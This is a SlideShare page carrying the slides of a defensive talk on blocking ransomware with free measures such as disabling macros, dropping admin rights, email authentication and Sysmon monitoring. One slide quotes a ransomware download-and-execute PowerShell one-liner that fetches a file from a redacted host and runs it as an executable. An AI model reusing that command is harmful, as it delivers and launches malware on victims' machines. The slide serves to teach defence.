SlideShare a Scribd company logo

Ransomware 0 admins 1

Download as PPTX, PDF
K
kieranjacobsen

The truth is that money can’t buy security just as it cannot buy happiness. Ransomware has become a cybercriminal’s most profitable enterprise, and something that IT professionals and even the general public now fear. Ransomware is actually pretty simple and unsophisticated code, and at times the damage can stopped with some simple tricks. Best of all, these are FREE!

Technology
1 of 36
Ransomware 0: Admins 1 Kieran Jacobsen
Kieran Jacobsen • Work at Readify • Technical Lead • Twitter: @Kjacobsen • Poshsecurity.com • PlanetPowerShell.com
What Is Ransomware?
The impact of ransomware 0% 10% 20% 30% 40% 50% 60% 70% 80% 90% 100% Source: CyberEdge
Threat Hirerachy 1. Malware (viruses, worms, trojans). 2. Phishing. 3. Insider threats. 4. APT. 5. Ransomware 6. Web Application Attacks. 7. SSL-encrypted threats. 8. DoS/DDoS 9. Drive-by & watering-hole Source: CyberEdge
Impacted Verticals 0% 10% 20% 30% 40% 50% 60% 70% 80% Technology Financial Services Healthcare Government Source: CyberEdge
The Rising Cost of Ransomware Bitcoin Exchange Rate (USD)
How Does it Get in? Source: Osterman Research 0% 5% 10% 15% 20% 25% 30% 35% Email link Email attachment Website (non- social media) Social Media USB Stick Business Application Unknown
An Example Attack
cmd /c PowerShell (New-Object System.Net.WebClient).DownloadFile('h ttp://<omitted>/2011/stinfo.pdf','%TM P%yvatu.exe');Start-Process '%TMP%yvatu.exe
Reducing the Risks
1. Disable macros • Significantly impacts infection chain. • 31% of ransomware infections came from email attachments, typically Word document with macros. • Either: • Disable All • Disable macros marked as from the internet • https://decentsecurity.com/enterprise/#/block-office-macros/
2. Don’t run as admin • Significantly impacts infection chain. • Rethink developer and sysadmin privileges. • Old Rant by Jeff Atwood: https://blog.codinghorror.com/the-windows- security-epidemic-dont-run-as-an-administrator/
3. Configure UAC
3. Configure UAC • UAC elevation requests are passed to the Antimalware Scan Interface (AMSI). • https://www.tenforums.com/tutorials/3577- change-user-account-control-uac-settings- windows-10-a.html
4. Open scripts in notepad • .ps1 files do not execute when double-clicked. • Change the following to open in notepad: • .bat (often overlooked) • .vbe and .vbs • .wsh and wsf • .js and .jse • http://www.dankalia.com/tutor/01002/0100201018.htm
5a. EMET • Enhanced Mitigation Experience Toolkit – New EOL date 2018-08-31. • Applies security mitigation technologies to running applications: DEP, SEHOP, Null Page, Heap Spray, EAF, EAF+, Mandatory ASLR, Bottom Up ASLR, Load Lib, Memory Protection, Caller, Sim Exec Flow, Stack Pivot, ASR • Provides configuration SSL/TLS certificate pinning. • Provides ability to block untrusted fonts. • Group Policy ADM/ADMX files. • Bundled with recommended protections for a variety of Microsoft and 3rd Party Apps. • Disable protections on Chrome due to conflicts. • http://www.zdnet.com/article/emet-your-enterprise-for-peak-windows-security/
5b. Inbuilt protections in Windows 10 • Windows: • Windows 10, version 1607 and later • Windows Server 2016 • On for all 64bit processes: DEP, SEHOP and ASLR. • Configurable protections: DEP, DEP-ATL Trunk, SEHOP, Mandatory ASLR, Bottom Up ASLR • Configurable by, well, Group Policy. • https://technet.microsoft.com/en-us/itpro/windows/keep-secure/override- mitigation-options-for-app-related-security-policies?f=255&MSPPError=- 2147217396
6. Deploy Chrome and Firefox • Reduces issues caused by users attempting to install 3rd party browsers. • Chrome is the leader of the pack, followed by Edge for security. • Chrome has ADM/ADMX files for Group Policy, Firefox has 3rd party Group Policy support • Chrome: http://goo.gl/2QvOT • Firefox: https://developer.mozilla.org/en- US/Firefox/Enterprise_deployment
7. Block Ads
7. Block Ads • Internet Explorer: https://decentsecurity.com/adblocking-for- internet-explorer-deployment/ • Edge: https://www.microsoft.com/en- us/store/p/adblock/9nblggh4rfhk • Chrome: https://decentsecurity.com/ublock-for-google-chrome- deployment/ • Firefox: https://decentsecurity.com/ublock-for-firefox- deployment/
8. Filter common email attacks • Identify common phrases and syntax in Phishing and Ransomware emails. • Quarantine them before they get to your users. • https://github.com/SwiftOnSecurity/PhishingRegex
9. Enable SPF, DKIM and DMARC • SPF: Domain owner specifies servers allowed to send email. • DKIM: A domain assets responsibility for sending emails. • DMARC: Combined SPF + DKIM, allows policy assertions and collection of data. • https://dmarc.org/presentations/Email-Authentication- Basics-2015Q2.pdf
9. Enable SPF, DKIM and DMARC Alexa Top 500 - DMARC Usage DMARC No DMARC Source: Detectify
10. Implement SYSMON Sysmon from Microsoft ( https://technet.microsoft.com/en-us/sysinternals/sysmon ) + Configuration from Swift on Security ( https://github.com/SwiftOnSecurity/sysmon-config/ ) + Free SIEM from Gray Log ( https://www.graylog.org/ ) + Sysmon for Graylog ( https://github.com/ion-storm/Graylog_Sysmon ) = Awesome Dashboard
10. Implement SYSMON Source: @ionstorm
Thank You www.expertslive.org.au #expertsliveau

Recommended

Spyware And Anti Virus Software Presentation
Spyware And Anti Virus Software PresentationSpyware And Anti Virus Software Presentation
Spyware And Anti Virus Software Presentationamy.covington215944
 
Cisco Content Security
Cisco Content SecurityCisco Content Security
Cisco Content Security
Cisco Canada
 
20150616 NPO要知道的駭客攻擊手法
20150616 NPO要知道的駭客攻擊手法20150616 NPO要知道的駭客攻擊手法
20150616 NPO要知道的駭客攻擊手法
Net Tuesday Taiwan
 
Seguridad Corporativa Con Internet Explorer 8(1)
Seguridad Corporativa Con Internet Explorer 8(1)Seguridad Corporativa Con Internet Explorer 8(1)
Seguridad Corporativa Con Internet Explorer 8(1)Microsoft Argentina y Uruguay [Official Space]
 
Endpoint Security
Endpoint Security Endpoint Security
Endpoint Security
Zack Fabro
 
ATP
ATPATP
ATP
Lan & Wan Solutions
 
Today's malware aint what you think
Today's malware aint what you thinkToday's malware aint what you think
Today's malware aint what you think
Nathan Winters
 
Cscu module 03 protecting systems using antiviruses
Cscu module 03 protecting systems using antivirusesCscu module 03 protecting systems using antiviruses
Cscu module 03 protecting systems using antivirusesSejahtera Affif
 

Recommended

Spyware And Anti Virus Software Presentation
Spyware And Anti Virus Software PresentationSpyware And Anti Virus Software Presentation
Spyware And Anti Virus Software Presentationamy.covington215944
 
Cisco Content Security
Cisco Content SecurityCisco Content Security
Cisco Content Security
Cisco Canada
 
20150616 NPO要知道的駭客攻擊手法
20150616 NPO要知道的駭客攻擊手法20150616 NPO要知道的駭客攻擊手法
20150616 NPO要知道的駭客攻擊手法
Net Tuesday Taiwan
 
Seguridad Corporativa Con Internet Explorer 8(1)
Seguridad Corporativa Con Internet Explorer 8(1)Seguridad Corporativa Con Internet Explorer 8(1)
Seguridad Corporativa Con Internet Explorer 8(1)Microsoft Argentina y Uruguay [Official Space]
 
Endpoint Security
Endpoint Security Endpoint Security
Endpoint Security
Zack Fabro
 
ATP
ATPATP
ATP
Lan & Wan Solutions
 
Today's malware aint what you think
Today's malware aint what you thinkToday's malware aint what you think
Today's malware aint what you think
Nathan Winters
 
Cscu module 03 protecting systems using antiviruses
Cscu module 03 protecting systems using antivirusesCscu module 03 protecting systems using antiviruses
Cscu module 03 protecting systems using antivirusesSejahtera Affif
 
Dev Abhijet Gagan Chaitanya VII-A ....Salwan public school
Dev Abhijet Gagan Chaitanya VII-A ....Salwan public schoolDev Abhijet Gagan Chaitanya VII-A ....Salwan public school
Dev Abhijet Gagan Chaitanya VII-A ....Salwan public school
Devku45
 
Intro to Malware Analysis
Intro to Malware AnalysisIntro to Malware Analysis
Intro to Malware Analysis
wremes
 
Spyware powerpoint
Spyware powerpointSpyware powerpoint
Spyware powerpoint
galaxy201
 
Security is Hard
Security is HardSecurity is Hard
Security is HardMike Murray
 
Microsoft Unified Communications - Securing Exchange Server 2007 Messaging Wh...
Microsoft Unified Communications - Securing Exchange Server 2007 Messaging Wh...Microsoft Unified Communications - Securing Exchange Server 2007 Messaging Wh...
Microsoft Unified Communications - Securing Exchange Server 2007 Messaging Wh...
Microsoft Private Cloud
 
Top Ten Ways to Shockproof Your Use of Social Media (Lightning Talk)
Top Ten Ways to Shockproof Your Use of Social Media (Lightning Talk)Top Ten Ways to Shockproof Your Use of Social Media (Lightning Talk)
Top Ten Ways to Shockproof Your Use of Social Media (Lightning Talk)
Ben Woelk, CISSP, CPTC
 
Virus encryption
Virus encryptionVirus encryption
Virus encryption
ssusere0e9b7
 
Cyber Security – Virus and the Internet
Cyber Security – Virus and the Internet Cyber Security – Virus and the Internet
Cyber Security – Virus and the Internet
Love Steven
 
Lab 2
Lab 2Lab 2
Lab 2novelinbabate2
 
The Various Classes of Antivirus!
The Various Classes of Antivirus!The Various Classes of Antivirus!
The Various Classes of Antivirus!
Enetfix (Pairsys, Inc.)
 
Content Management System Security
Content Management System SecurityContent Management System Security
Content Management System Security
Samvel Gevorgyan
 
The Enemy Within: Organizational Insight Through the Eyes of a Webserver
The Enemy Within: Organizational Insight Through the Eyes of a WebserverThe Enemy Within: Organizational Insight Through the Eyes of a Webserver
The Enemy Within: Organizational Insight Through the Eyes of a Webserver
Ramece Cave
 
Defending Against the Dark Arts of LOLBINS
Defending Against the Dark Arts of LOLBINS Defending Against the Dark Arts of LOLBINS
Defending Against the Dark Arts of LOLBINS
Brent Muir
 
Spyware
SpywareSpyware
Spywaresubharock
 
Pentesting Android Apps
Pentesting Android AppsPentesting Android Apps
Pentesting Android Apps
Abdelhamid Limami
 
What are the top 10 web security risks?
What are the top 10 web security risks?What are the top 10 web security risks?
What are the top 10 web security risks?
Jacklin Berry
 
Security in Android Application, Александр Смирнов, RedMadRobot, Москва
Security in Android Application, Александр Смирнов, RedMadRobot, Москва Security in Android Application, Александр Смирнов, RedMadRobot, Москва
Security in Android Application, Александр Смирнов, RedMadRobot, Москва
it-people
 
10 things I’ve learnt about web application security
10 things I’ve learnt about web application security10 things I’ve learnt about web application security
10 things I’ve learnt about web application security
James Crowley
 
Phishing with Super Bait
Phishing with Super BaitPhishing with Super Bait
Phishing with Super Bait
Jeremiah Grossman
 
Strayer sec 420
Strayer sec 420Strayer sec 420
Strayer sec 420
uopassignment
 
Layer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdfLayer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdf
distortdistort
 
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-INWannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
Vijay Sarathy Rangayyan
 

More Related Content

What's hot

Dev Abhijet Gagan Chaitanya VII-A ....Salwan public school
Dev Abhijet Gagan Chaitanya VII-A ....Salwan public schoolDev Abhijet Gagan Chaitanya VII-A ....Salwan public school
Dev Abhijet Gagan Chaitanya VII-A ....Salwan public school
Devku45
 
Intro to Malware Analysis
Intro to Malware AnalysisIntro to Malware Analysis
Intro to Malware Analysis
wremes
 
Spyware powerpoint
Spyware powerpointSpyware powerpoint
Spyware powerpoint
galaxy201
 
Security is Hard
Security is HardSecurity is Hard
Security is HardMike Murray
 
Microsoft Unified Communications - Securing Exchange Server 2007 Messaging Wh...
Microsoft Unified Communications - Securing Exchange Server 2007 Messaging Wh...Microsoft Unified Communications - Securing Exchange Server 2007 Messaging Wh...
Microsoft Unified Communications - Securing Exchange Server 2007 Messaging Wh...
Microsoft Private Cloud
 
Top Ten Ways to Shockproof Your Use of Social Media (Lightning Talk)
Top Ten Ways to Shockproof Your Use of Social Media (Lightning Talk)Top Ten Ways to Shockproof Your Use of Social Media (Lightning Talk)
Top Ten Ways to Shockproof Your Use of Social Media (Lightning Talk)
Ben Woelk, CISSP, CPTC
 
Virus encryption
Virus encryptionVirus encryption
Virus encryption
ssusere0e9b7
 
Cyber Security – Virus and the Internet
Cyber Security – Virus and the Internet Cyber Security – Virus and the Internet
Cyber Security – Virus and the Internet
Love Steven
 
The Various Classes of Antivirus!
The Various Classes of Antivirus!The Various Classes of Antivirus!
The Various Classes of Antivirus!
Enetfix (Pairsys, Inc.)
 
Content Management System Security
Content Management System SecurityContent Management System Security
Content Management System Security
Samvel Gevorgyan
 
The Enemy Within: Organizational Insight Through the Eyes of a Webserver
The Enemy Within: Organizational Insight Through the Eyes of a WebserverThe Enemy Within: Organizational Insight Through the Eyes of a Webserver
The Enemy Within: Organizational Insight Through the Eyes of a Webserver
Ramece Cave
 
Defending Against the Dark Arts of LOLBINS
Defending Against the Dark Arts of LOLBINS Defending Against the Dark Arts of LOLBINS
Defending Against the Dark Arts of LOLBINS
Brent Muir
 
Pentesting Android Apps
Pentesting Android AppsPentesting Android Apps
Pentesting Android Apps
Abdelhamid Limami
 
What are the top 10 web security risks?
What are the top 10 web security risks?What are the top 10 web security risks?
What are the top 10 web security risks?
Jacklin Berry
 
Security in Android Application, Александр Смирнов, RedMadRobot, Москва
Security in Android Application, Александр Смирнов, RedMadRobot, Москва Security in Android Application, Александр Смирнов, RedMadRobot, Москва
Security in Android Application, Александр Смирнов, RedMadRobot, Москва
it-people
 
10 things I’ve learnt about web application security
10 things I’ve learnt about web application security10 things I’ve learnt about web application security
10 things I’ve learnt about web application security
James Crowley
 
Phishing with Super Bait
Phishing with Super BaitPhishing with Super Bait
Phishing with Super Bait
Jeremiah Grossman
 
Strayer sec 420
Strayer sec 420Strayer sec 420
Strayer sec 420
uopassignment
 

What's hot (20)

Dev Abhijet Gagan Chaitanya VII-A ....Salwan public school
Dev Abhijet Gagan Chaitanya VII-A ....Salwan public schoolDev Abhijet Gagan Chaitanya VII-A ....Salwan public school
Dev Abhijet Gagan Chaitanya VII-A ....Salwan public school
 
Intro to Malware Analysis
Intro to Malware AnalysisIntro to Malware Analysis
Intro to Malware Analysis
 
Spyware powerpoint
Spyware powerpointSpyware powerpoint
Spyware powerpoint
 
Security is Hard
Security is HardSecurity is Hard
Security is Hard
 
Microsoft Unified Communications - Securing Exchange Server 2007 Messaging Wh...
Microsoft Unified Communications - Securing Exchange Server 2007 Messaging Wh...Microsoft Unified Communications - Securing Exchange Server 2007 Messaging Wh...
Microsoft Unified Communications - Securing Exchange Server 2007 Messaging Wh...
 
Top Ten Ways to Shockproof Your Use of Social Media (Lightning Talk)
Top Ten Ways to Shockproof Your Use of Social Media (Lightning Talk)Top Ten Ways to Shockproof Your Use of Social Media (Lightning Talk)
Top Ten Ways to Shockproof Your Use of Social Media (Lightning Talk)
 
Virus encryption
Virus encryptionVirus encryption
Virus encryption
 
Cyber Security – Virus and the Internet
Cyber Security – Virus and the Internet Cyber Security – Virus and the Internet
Cyber Security – Virus and the Internet
 
Lab 2
Lab 2Lab 2
Lab 2
 
The Various Classes of Antivirus!
The Various Classes of Antivirus!The Various Classes of Antivirus!
The Various Classes of Antivirus!
 
Content Management System Security
Content Management System SecurityContent Management System Security
Content Management System Security
 
The Enemy Within: Organizational Insight Through the Eyes of a Webserver
The Enemy Within: Organizational Insight Through the Eyes of a WebserverThe Enemy Within: Organizational Insight Through the Eyes of a Webserver
The Enemy Within: Organizational Insight Through the Eyes of a Webserver
 
Defending Against the Dark Arts of LOLBINS
Defending Against the Dark Arts of LOLBINS Defending Against the Dark Arts of LOLBINS
Defending Against the Dark Arts of LOLBINS
 
Spyware
SpywareSpyware
Spyware
 
Pentesting Android Apps
Pentesting Android AppsPentesting Android Apps
Pentesting Android Apps
 
What are the top 10 web security risks?
What are the top 10 web security risks?What are the top 10 web security risks?
What are the top 10 web security risks?
 
Security in Android Application, Александр Смирнов, RedMadRobot, Москва
Security in Android Application, Александр Смирнов, RedMadRobot, Москва Security in Android Application, Александр Смирнов, RedMadRobot, Москва
Security in Android Application, Александр Смирнов, RedMadRobot, Москва
 
10 things I’ve learnt about web application security
10 things I’ve learnt about web application security10 things I’ve learnt about web application security
10 things I’ve learnt about web application security
 
Phishing with Super Bait
Phishing with Super BaitPhishing with Super Bait
Phishing with Super Bait
 
Strayer sec 420
Strayer sec 420Strayer sec 420
Strayer sec 420
 

Similar to Ransomware 0 admins 1

Layer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdfLayer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdf
distortdistort
 
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-INWannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
Vijay Sarathy Rangayyan
 
Keep Ahead of Evolving Cyberattacks with OPSWAT and F5 NGINX
Keep Ahead of Evolving Cyberattacks with OPSWAT and F5 NGINXKeep Ahead of Evolving Cyberattacks with OPSWAT and F5 NGINX
Keep Ahead of Evolving Cyberattacks with OPSWAT and F5 NGINX
NGINX, Inc.
 
Cisco Security Presentation
Cisco Security PresentationCisco Security Presentation
Cisco Security Presentation
Simplex
 
Ransomware History and Monitoring Tips
Ransomware History and Monitoring TipsRansomware History and Monitoring Tips
Ransomware History and Monitoring Tips
NetFort
 
Best practices to secure Windows10 with already included features
Best practices to secure Windows10 with already included featuresBest practices to secure Windows10 with already included features
Best practices to secure Windows10 with already included features
Alexander Benoit
 
How Malware Works - Understanding Software Vulnerabilities
How Malware Works - Understanding Software VulnerabilitiesHow Malware Works - Understanding Software Vulnerabilities
How Malware Works - Understanding Software Vulnerabilities
Bunmi Sowande
 
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
Cenzic
 
Protecting Your organization from WannaCry Ransomware
Protecting Your organization from WannaCry RansomwareProtecting Your organization from WannaCry Ransomware
Protecting Your organization from WannaCry Ransomware
Quick Heal Technologies Ltd.
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
MarketingArrowECS_CZ
 
How PCI And PA DSS will change enterprise applications
How PCI And PA DSS will change enterprise applicationsHow PCI And PA DSS will change enterprise applications
How PCI And PA DSS will change enterprise applications
Ben Rothke
 
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionScaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
Wayne Huang
 
TRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasTRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasAditya K Sood
 
Mobile security
Mobile securityMobile security
Mobile security
Stefaan
 
Complete Endpoint protection
Complete Endpoint protectionComplete Endpoint protection
Complete Endpoint protection
xband
 
Protect Yourself Against Today's Cybercriminals and Hackers
Protect Yourself Against Today's Cybercriminals and HackersProtect Yourself Against Today's Cybercriminals and Hackers
Protect Yourself Against Today's Cybercriminals and Hackers
Kaseya
 
A Closer Look at Isolation: Hype or Next Gen Security?
A Closer Look at Isolation: Hype or Next Gen Security?A Closer Look at Isolation: Hype or Next Gen Security?
A Closer Look at Isolation: Hype or Next Gen Security?
MenloSecurity
 
"Evolving Cybersecurity Strategies" - Threat protection and incident managment
"Evolving Cybersecurity Strategies" - Threat protection and incident managment"Evolving Cybersecurity Strategies" - Threat protection and incident managment
"Evolving Cybersecurity Strategies" - Threat protection and incident managment
Dean Iacovelli
 
The cyber house of horrors - securing the expanding attack surface
The cyber house of horrors - securing the expanding attack surfaceThe cyber house of horrors - securing the expanding attack surface
The cyber house of horrors - securing the expanding attack surface
Jason Bloomberg
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015 sebaSolvay secure application layer v2015 seba
Solvay secure application layer v2015 seba
Sebastien Deleersnyder
 

Similar to Ransomware 0 admins 1 (20)

Layer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdfLayer7-WebServices-Hacking-and-Hardening.pdf
Layer7-WebServices-Hacking-and-Hardening.pdf
 
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-INWannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
WannaCry (WannaCrypt) Ransomware - Advisory from CERT-IN
 
Keep Ahead of Evolving Cyberattacks with OPSWAT and F5 NGINX
Keep Ahead of Evolving Cyberattacks with OPSWAT and F5 NGINXKeep Ahead of Evolving Cyberattacks with OPSWAT and F5 NGINX
Keep Ahead of Evolving Cyberattacks with OPSWAT and F5 NGINX
 
Cisco Security Presentation
Cisco Security PresentationCisco Security Presentation
Cisco Security Presentation
 
Ransomware History and Monitoring Tips
Ransomware History and Monitoring TipsRansomware History and Monitoring Tips
Ransomware History and Monitoring Tips
 
Best practices to secure Windows10 with already included features
Best practices to secure Windows10 with already included featuresBest practices to secure Windows10 with already included features
Best practices to secure Windows10 with already included features
 
How Malware Works - Understanding Software Vulnerabilities
How Malware Works - Understanding Software VulnerabilitiesHow Malware Works - Understanding Software Vulnerabilities
How Malware Works - Understanding Software Vulnerabilities
 
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
 
Protecting Your organization from WannaCry Ransomware
Protecting Your organization from WannaCry RansomwareProtecting Your organization from WannaCry Ransomware
Protecting Your organization from WannaCry Ransomware
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
How PCI And PA DSS will change enterprise applications
How PCI And PA DSS will change enterprise applicationsHow PCI And PA DSS will change enterprise applications
How PCI And PA DSS will change enterprise applications
 
Scaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware InfectionScaling Web 2.0 Malware Infection
Scaling Web 2.0 Malware Infection
 
TRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , TexasTRISC 2010 - Grapevine , Texas
TRISC 2010 - Grapevine , Texas
 
Mobile security
Mobile securityMobile security
Mobile security
 
Complete Endpoint protection
Complete Endpoint protectionComplete Endpoint protection
Complete Endpoint protection
 
Protect Yourself Against Today's Cybercriminals and Hackers
Protect Yourself Against Today's Cybercriminals and HackersProtect Yourself Against Today's Cybercriminals and Hackers
Protect Yourself Against Today's Cybercriminals and Hackers
 
A Closer Look at Isolation: Hype or Next Gen Security?
A Closer Look at Isolation: Hype or Next Gen Security?A Closer Look at Isolation: Hype or Next Gen Security?
A Closer Look at Isolation: Hype or Next Gen Security?
 
"Evolving Cybersecurity Strategies" - Threat protection and incident managment
"Evolving Cybersecurity Strategies" - Threat protection and incident managment"Evolving Cybersecurity Strategies" - Threat protection and incident managment
"Evolving Cybersecurity Strategies" - Threat protection and incident managment
 
The cyber house of horrors - securing the expanding attack surface
The cyber house of horrors - securing the expanding attack surfaceThe cyber house of horrors - securing the expanding attack surface
The cyber house of horrors - securing the expanding attack surface
 
Solvay secure application layer v2015 seba
Solvay secure application layer v2015 sebaSolvay secure application layer v2015 seba
Solvay secure application layer v2015 seba
 

More from kieranjacobsen

The Boring Security Talk - Azure Global Bootcamp Melbourne 2019
The Boring Security Talk - Azure Global Bootcamp Melbourne 2019The Boring Security Talk - Azure Global Bootcamp Melbourne 2019
The Boring Security Talk - Azure Global Bootcamp Melbourne 2019
kieranjacobsen
 
CrikeyCon VI - The Boring Security Talk
CrikeyCon VI - The Boring Security TalkCrikeyCon VI - The Boring Security Talk
CrikeyCon VI - The Boring Security Talk
kieranjacobsen
 
The Boring Security Talk
The Boring Security TalkThe Boring Security Talk
The Boring Security Talk
kieranjacobsen
 
The Boring Security Talk
The Boring Security TalkThe Boring Security Talk
The Boring Security Talk
kieranjacobsen
 
Secure Azure Deployment Patterns
Secure Azure Deployment PatternsSecure Azure Deployment Patterns
Secure Azure Deployment Patterns
kieranjacobsen
 
Ransomware 0, Admins 1
Ransomware 0, Admins 1Ransomware 0, Admins 1
Ransomware 0, Admins 1
kieranjacobsen
 
DecSecOps in 10 minutes
DecSecOps in 10 minutesDecSecOps in 10 minutes
DecSecOps in 10 minutes
kieranjacobsen
 
DevSecOps in 10 minutes
DevSecOps in 10 minutesDevSecOps in 10 minutes
DevSecOps in 10 minutes
kieranjacobsen
 
Infrastructure Saturday - Level Up to DevSecOps
Infrastructure Saturday - Level Up to DevSecOpsInfrastructure Saturday - Level Up to DevSecOps
Infrastructure Saturday - Level Up to DevSecOps
kieranjacobsen
 
Dev Breakfast: Level up to DevSecOps
Dev Breakfast: Level up to DevSecOpsDev Breakfast: Level up to DevSecOps
Dev Breakfast: Level up to DevSecOps
kieranjacobsen
 
DevSecOps - CrikeyCon 2017
DevSecOps - CrikeyCon 2017DevSecOps - CrikeyCon 2017
DevSecOps - CrikeyCon 2017
kieranjacobsen
 
Evolving your automation with hybrid workers
Evolving your automation with hybrid workersEvolving your automation with hybrid workers
Evolving your automation with hybrid workers
kieranjacobsen
 
Global Azure Bootcamp 2016 - Azure Automation Invades Your Data Centre
Global Azure Bootcamp 2016 - Azure Automation Invades Your Data CentreGlobal Azure Bootcamp 2016 - Azure Automation Invades Your Data Centre
Global Azure Bootcamp 2016 - Azure Automation Invades Your Data Centre
kieranjacobsen
 
Azure automation invades your data centre
Azure automation invades your data centreAzure automation invades your data centre
Azure automation invades your data centre
kieranjacobsen
 
Exploiting MS15-034 In PowerShell
Exploiting MS15-034 In PowerShellExploiting MS15-034 In PowerShell
Exploiting MS15-034 In PowerShell
kieranjacobsen
 
Lateral Movement with PowerShell
Lateral Movement with PowerShellLateral Movement with PowerShell
Lateral Movement with PowerShell
kieranjacobsen
 
Fun with the Hak5 Rubber Ducky
Fun with the Hak5 Rubber DuckyFun with the Hak5 Rubber Ducky
Fun with the Hak5 Rubber Ducky
kieranjacobsen
 
Lateral Movement with PowerShell
Lateral Movement with PowerShellLateral Movement with PowerShell
Lateral Movement with PowerShell
kieranjacobsen
 
Enabling Enterprise Mobility
Enabling Enterprise MobilityEnabling Enterprise Mobility
Enabling Enterprise Mobility
kieranjacobsen
 
Advanced PowerShell Automation
Advanced PowerShell AutomationAdvanced PowerShell Automation
Advanced PowerShell Automation
kieranjacobsen
 

More from kieranjacobsen (20)

The Boring Security Talk - Azure Global Bootcamp Melbourne 2019
The Boring Security Talk - Azure Global Bootcamp Melbourne 2019The Boring Security Talk - Azure Global Bootcamp Melbourne 2019
The Boring Security Talk - Azure Global Bootcamp Melbourne 2019
 
CrikeyCon VI - The Boring Security Talk
CrikeyCon VI - The Boring Security TalkCrikeyCon VI - The Boring Security Talk
CrikeyCon VI - The Boring Security Talk
 
The Boring Security Talk
The Boring Security TalkThe Boring Security Talk
The Boring Security Talk
 
The Boring Security Talk
The Boring Security TalkThe Boring Security Talk
The Boring Security Talk
 
Secure Azure Deployment Patterns
Secure Azure Deployment PatternsSecure Azure Deployment Patterns
Secure Azure Deployment Patterns
 
Ransomware 0, Admins 1
Ransomware 0, Admins 1Ransomware 0, Admins 1
Ransomware 0, Admins 1
 
DecSecOps in 10 minutes
DecSecOps in 10 minutesDecSecOps in 10 minutes
DecSecOps in 10 minutes
 
DevSecOps in 10 minutes
DevSecOps in 10 minutesDevSecOps in 10 minutes
DevSecOps in 10 minutes
 
Infrastructure Saturday - Level Up to DevSecOps
Infrastructure Saturday - Level Up to DevSecOpsInfrastructure Saturday - Level Up to DevSecOps
Infrastructure Saturday - Level Up to DevSecOps
 
Dev Breakfast: Level up to DevSecOps
Dev Breakfast: Level up to DevSecOpsDev Breakfast: Level up to DevSecOps
Dev Breakfast: Level up to DevSecOps
 
DevSecOps - CrikeyCon 2017
DevSecOps - CrikeyCon 2017DevSecOps - CrikeyCon 2017
DevSecOps - CrikeyCon 2017
 
Evolving your automation with hybrid workers
Evolving your automation with hybrid workersEvolving your automation with hybrid workers
Evolving your automation with hybrid workers
 
Global Azure Bootcamp 2016 - Azure Automation Invades Your Data Centre
Global Azure Bootcamp 2016 - Azure Automation Invades Your Data CentreGlobal Azure Bootcamp 2016 - Azure Automation Invades Your Data Centre
Global Azure Bootcamp 2016 - Azure Automation Invades Your Data Centre
 
Azure automation invades your data centre
Azure automation invades your data centreAzure automation invades your data centre
Azure automation invades your data centre
 
Exploiting MS15-034 In PowerShell
Exploiting MS15-034 In PowerShellExploiting MS15-034 In PowerShell
Exploiting MS15-034 In PowerShell
 
Lateral Movement with PowerShell
Lateral Movement with PowerShellLateral Movement with PowerShell
Lateral Movement with PowerShell
 
Fun with the Hak5 Rubber Ducky
Fun with the Hak5 Rubber DuckyFun with the Hak5 Rubber Ducky
Fun with the Hak5 Rubber Ducky
 
Lateral Movement with PowerShell
Lateral Movement with PowerShellLateral Movement with PowerShell
Lateral Movement with PowerShell
 
Enabling Enterprise Mobility
Enabling Enterprise MobilityEnabling Enterprise Mobility
Enabling Enterprise Mobility
 
Advanced PowerShell Automation
Advanced PowerShell AutomationAdvanced PowerShell Automation
Advanced PowerShell Automation
 

Recently uploaded

IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptxIOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
IOS-PENTESTING-BEGINNERS-PRACTICAL-GUIDE-.pptx
Abida Shariff
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
Guy Korland
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
DianaGray10
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
91mobiles
 
UiPath Test Automation using UiPath Test Suite series, part 3
